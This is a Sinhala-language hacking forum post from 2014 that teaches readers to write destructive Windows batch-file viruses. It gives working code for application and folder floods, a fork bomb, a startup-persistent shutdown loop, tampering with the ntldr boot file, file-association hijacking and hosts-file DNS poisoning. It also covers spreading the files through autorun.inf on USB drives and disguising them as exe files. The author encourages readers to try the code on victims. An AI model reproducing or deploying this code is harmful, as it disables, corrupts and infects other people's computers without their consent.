BATCH Programming මගින් VIRUSES නිර්මාණය කිරීම.

හැකින් ගැන දැනුම share කරගන්න.

Moderator: Mr.Angel

BATCH Programming මගින් VIRUSES නිර්මාණය කිරීම.

Postby H4CK3R# » Wed Sep 10, 2014 12:40 pm

හොඳයි හුඟ දවසකින් Hacking ගැන මුකුත් දැම්මේ නෑ මොකද Programming Post වලට මුල්තැන දීල හිටපු නිසා. ඒ මොකද HACKER කෙනෙක් වෙන්නනම් ඉතින් ඉස්සරලාම ඊට අවශ්‍ය දැනුම රැස්කරගෙන ඉන්න වෙනව නැත්නම් hack වෙන්නේ අපිවමයි. අන්න එතනදී HACKER කෙනෙක් විදිහට අවම වශයෙන් එක් Programming language එකක්වත් හැසිරවීමේ හැකියාව තිබීම ඉතාමත් වැදගත්. හරි අපි මාතෘකාව දිහාවට හැරෙමුකො.

මේ BATCH files කියන්නේ windows පරිඝණක වල ක්‍රියාත්මක කල හැකි ".bat" කියන extensions එක සහිත files විශේෂයකට. අපිට පුලුවන් මේ BATCH FILES හරහා ඉතාමත් විනාශකාරී VIRUSES නිර්මාණය කරන්න. හරි මං දැන් දෙනව ඔයාලට code එකක් ඒ code එක notepad එකකට paste කරල අපි ඒක save කරන්න ඔනෙ .bat කියන extension එක සහිතව (උදා H4CK3R.bat) ඒ වගේම මතක ඇතුව all files කියල දෙන්න. දැන් VIRUSES එක attack එකට සූදානම්. නමුත් ඊට කලින් අපි පොඩ්ඩක් මෙ BATCH files වල ක්‍රියාකාරීත්වය ගැන පොඩි අවදානයක් යොමු කරල ඉමු.

මොනවද මේ Batch Files කියන්නේ?

අපි පොඩි උදාහරනයකින් පටන් ගමු, මුලින්ම ඔයාලගේ command prompt(cmd) එක open කරගන්නකෝ ඊට පස්සේ cmd එකෙන් desktop එකට එන්න (cd desktop කියල type කරල enter කරානම් හරි).

දැන් පිලිවලින් එකින් එක මේ commands ටික දෙන්නකො.
Code: Select all
md blah1

Code: Select all
cd blah1

Code: Select all
md blah2


පලවෙනි එකෙන් කරන්නේ blah1 කියන නමින් ඔයාලගේ desktop එකේ folder එකක් හදනව. දෙවනි command එකෙන් වෙන්නේ cmd එකෙන් blah1 කියන folder එක ඇතුලට යනව. තුන්වෙනි එකෙන් වෙන්නේ blah1 කියන folder එක ඇතුලේ blah2 කියල folder එකක් හැදෙනව. දැන් ඔයාලගේ desktop එකේ බැලුවොත් පෙනෙයි මේ විදිහේ folders හැදිල තියනව. හරි cmd එක වහල blah1 folder එක මකල දාන්න.

දැන් අපි මේකම වෙනත් ක්‍රමයකට කරන්නයි යන්නේ. මේ commands තුනම notpad එකකට ගන්නකො ඊට පස්සේ ඔයාලට කැමති නමක් දීල මේක save කරන්න හැබැයි මතක ඇතුව extension එක වෙන්න ඔනෙ .bat (desktop එකේම save කරන්න)

දැන් ඔයාල ඒ .bat file එක double click කරොත් පෙනෙයි අපි කලින් cmd එක මගින් commands තුනකින් කරපු දේ මේ .bat file එක මගින් එකවරම සිද්ද කරල තියනව. ඒ තියන්නෙ ඔයාගේ desktop එකේ blah1 කියල folder එකක් සහ ඒක ඇතුලේ blah2 කියල folder එකක් නිර්මානය වෙලා තියනව.

ඉතින් ඔයාලට තේරෙනව ඇති මේ batch එකක් මගින් පුලුවන් අපට cmd commands කීපයක් පිලිවලින් automatically execute කරගන්න.

මොනවද මේ batch viruses වලට කරන්න පුලුවන් දේවල්?

අපට පුලුවන් මේ batch viruses බාවිතා කරල windows files නැත්නම් system files මකල දාන්න සහ වෙනස් කරන්න, සම්පූර්න disk එකක් format කරන්න, තොරතුරු සොරාගන්න ඒවගේම disable firewalls, open ports, සම්පූර්නයෙන්ම registry එක වෙනස් කරන්න විනාස කරල දාන්න සහ මේ වගේ තව ගොඩක් දේවල්.

හොඳයි අපි දැන් සරල code එකකින් පටන් ගමු, පහත දැක්වෙක code එක notpad එකකට copy කරගන save කරගන්න. මතක තියා ගන්න අපි save කරන්න ඔන .bat කියල. (H4CK3R.bat)

1. Application Bomber

Code: Select all
@echo off
:x
start winword
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc
goto x


මෙහි @echo off මගින් සිදුකරනුයේ batch files එක executed වන අවස්තාවේදී commands නොපෙන්වා ක්‍රියා කිරීම සඳහායි. මෙහි x variable එක මගින් සිදුකරනුයේ මෙම batch files එක මගින් සිදුකරන ක්‍රියාවලිය නැවත නැවත සිදුකිරීමයි.
මෙම batch files එක execute කිරීමෙන් සිදුවන්නේ windows applications කීපයක්(notpad, cmd, etc...) open වීම සහ එය නැවත නැවත නොකඩවා සිදුවීමයි. මේ නිසා පරිඝණකයේ ක්‍රියාකාරීත්ව අඩපන වීමක් සිදුවේ.

2. Folder flooder

Code: Select all
@echo off
:x
md %random%
goto x


මෙහි ඇති %random% variable එක මගින් සිදුවන්නේ එකින් එකට වෙනස් numbers නිර්මාණය කිරීමයි. මෙම code එක මගින් අපිට පුලුවන් විශාල folders පුමාණයක් එකවර නිර්මානය කරගන්න. උදාහරනයක් විදිහට මෙම batch file එක අපි c drive එක ඇතුලේ වගේ ක්‍රියාත්මක කලොත් විනාඩි කීපයකින් c drive එක සම්පුර්ණයෙන්ම folders වලින් පුරවන්න පුලුවන්. එමගිනුත් පරිඝණකයේ න්‍රියාකාරීත්ව අඩපන වීමක් සිදුවෙනව

2.1.User account flooder

Code: Select all
@echo off
:x
net user %random%
goto x

මෙ code එකෙන් පුලුවන් අපි කලින් සිදුකරා වගේ folders වෙනුවට එකින් එකට වෙනස් user accounts විශාල ප්‍රමාණයක් නිර්මාණය කරන්න.


3.Shutdown Virus

Code: Select all
copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup”
shutdown -s -t 00

(1 සහ 2 line වල ඇති 'anything' වෙනුවට මෙම batch file එක save කිරීමේදී යොදා ගන්නා නමම ඇතුලත් කරන්න.)
මෙහි ඇති පලවන සහ දෙවන lines වලින් කරන්නේ මෙම batch file එක පරිඝණකයේ Startup folder එකට copy කරගන්නවා එම නිසා පරිඝණකය boot කරන සෑම අවස්තාවකම මෙම batch file එක ක්‍රියාත්මක වෙනව. එහිදී සිදුවන්නේ මෙහි තුන්වන line එකට අනුව පරිඝණකය සැනින් shutdown වීමයි. මෙම code එක windows xp සඳහා වන අතර මෙය windows 7 සඳහා බාවිතා කිරීමට path එක මෙ ලෙස වෙනස් කල යුතුයි C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

සෑම අවස්තාවකම පරිඝණකය න්‍රියාත්මක කීරීමේදී Startup folder හී ඇති batch file එක ක්‍රියාත්මක වී පරීඝණකය සැනින් නැවත shutdown වෙනව මේක නැවැත්වීමට windows Safe Mode හරහා පරිඝණකය boot කරල Startup folder එකේ තියන batch file එක delete කරල දාන්න ඔනෙ.


4. Deleting boot files

windows xp වලදී c drive එකේ තියනව file එකක් 'ntldr' කියල මේ file එක අනිව තියෙන්න ඔනේ windows boot වෙන්නනම් බැරිවෙලාවත් මේක නැතිවුවොත් කිසිවිටකත් පරිඝණකය boot වෙන්නේ නෑ. අපි batch file එකක් හදමු මේ file එක පරිඝණකයෙන් ඉවත් කරන්න.

Code: Select all
attrib -S -R -H C:\ntldr


මේක තමයි code එක. මේ batch එක එකපාරක් පරිඝණකයේ ක්‍රියාත්මක වුනොත් කිසිවිටක්ත් පරිඝණකය නැවත boot වෙන්නේ නම් නෑ. සාමාන්‍යයෙන් victim කෙනක් කරන්නේ මේ අවස්තාවෙදී නැවත windows install කීරීමයි.


5. Fork Bomb

Code: Select all
%0|%0


පෙනුමට ගොඩක් පොඩි වුනාට මෙයා ගොඩක් බයානකයි. මේ code එකෙන් කරන්නේ ඉක්මනින්ම විශාල processes ප්‍රමානයක් එකවර ක්‍රියාත්මක කරනව එමගින් windows සම්පූරිණයෙන්ම අඩපන වෙනවා.


6. Extension Changer

Code: Select all
@echo off
assoc .txt=anything
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything

මේකනම් තනිකරම පරිඝණකය පිස්සු වට්ටන batch file එකක්. මේකෙන් වෙන දේ තමයි අපි දන්නව පරිඝණකයේ තියන සෑම file එකකටම වගේ එයට වෙන්වූ file type එකක් තියනව(උදා- .exe .txt .jpeg .png .mpeg) ඉතින් මේ batch file එකෙන් කරන්නේ මේ extensions සියල්ල ‘anything’ කියන file type එකට වෙනස් කරනව. ආ.. anything කිවුවේ ඔයාලට කැමති එකක් දාගන්න පුලුවන්. මේ batch file එක ක්‍රියාත්මක කලොත් එතනින් පස්සේ .exe .txt .jpeg .png .mpeg මෙවැනි files open කරන එකනම් ලේසි වෙන්නේ නෑ.


7. DNS Poisoning

ඔන්න මේ ගැනනම් මං කලින් කියල දීල තියනව ඒ තමයි DNS. දන්නේ නැත්නම් මෙතනින් ගිහින් බලන්නකෝ.
Code: Select all
@echo off
echo xxx.xxx.xxx.xxx www.anything.com > C:\windows\system32\drivers\etc\hosts

'xxx.xxx.xxx.xxx' මෙතනට ඔයාලට දාන්න ඔන IP එකත්. 'www.anything.com' මෙතනට ඔයාලට ඔන web address එකත් දෙන්න.


තවදෙයක් තමයි මේ batch viruses ගොඩක් වෙලාවට anitiviruses වලින් හඳුන ගන්නේ නෑ. ඒ වගේම තමයි මං මේ ඔයාලට දීල තියෙන්නේ ගොඩක් ප්‍රසිද්ද batch viruses කීපයක්. ඔයාලට පුලුවන් මීට වඩා හොඳ viruses නිර්මානය කරන්න ඒකට ඔයාලට ඕන කරන්නේ DOS commands දැනගැනීම සහ තර්කාණු කූලව එවා බාවිතා කීරීමේ හැකියාව පමනයි.


Batch Viruses වල තියන දුර්වලතා -:

1. Victim ට පුලුවන් මේ batch file ලේසියෙන්ම notepad එකකින් open කරල බලන්න.
2. batch viruse එක ක්‍රියාත්මක වන අවස්තාවේ command prompt එක pops up වීමක් සිදුවෙනව ඒ නිසා ලේසියෙන්ම හඳුනගන්න පුලුවන්.

ඉතින් ඔයාලට මේ දුර්වලතා මගහැර ගන්න පුලුවන් batch file එක exe file එකක් විදිහට convert කරල. ඔයාලට පුලුවන් පහතින් Batch To Exe converter එක Download කරගන්න.
DOWNLOAD

ආ.. තවදෙයක් මේ batch viruses අපිට පුලුවන් pen drive එකක් හරහා පරිඝණක වලට ආසාධනය කරන්න මේ විදිහට. -:

Step 1: notepad එකක් Open කරල මේ code එක type කරගන්න.
Code: Select all
[autorun]
open=anything.bat
Icon=anything.ico


ඊට පස්සේ ‘autorun.inf’ කියල save කරන්න 'anything' කියන තැනට batch virus එකේ නම.

Step 2: ඊට පස්සේ මේ ‘autorun.inf’ එකයි ‘anything.bat’(ඔයාගේ virus එක) එකයි pendrive එකට දාන්න. දැන් pendrive එක windows පරිඝණකයකට සම්බන්ද කරපු ගමන් වැඩේ ගොඩ.

මේ දෙවල් ඉගන ගන්න විතරක්ම නෙමේ කරලත් බලන්න හොඳද. හරි හරි මං ගියා එහෙනම් ඊලඟ post එකෙත් හම්බෙමු.
  • 0

Admin in - H4CK3R#
"The quieter you become,the more you are able to hear..."
H4CK3R#
 
Posts: 5
Joined: Wed Sep 10, 2014 11:51 am
Has thanked: 0 time
Been thanked: 0 time
Reputation: 5

Return to Hacking

Who is online

Users browsing this forum: No registered users and 1 guest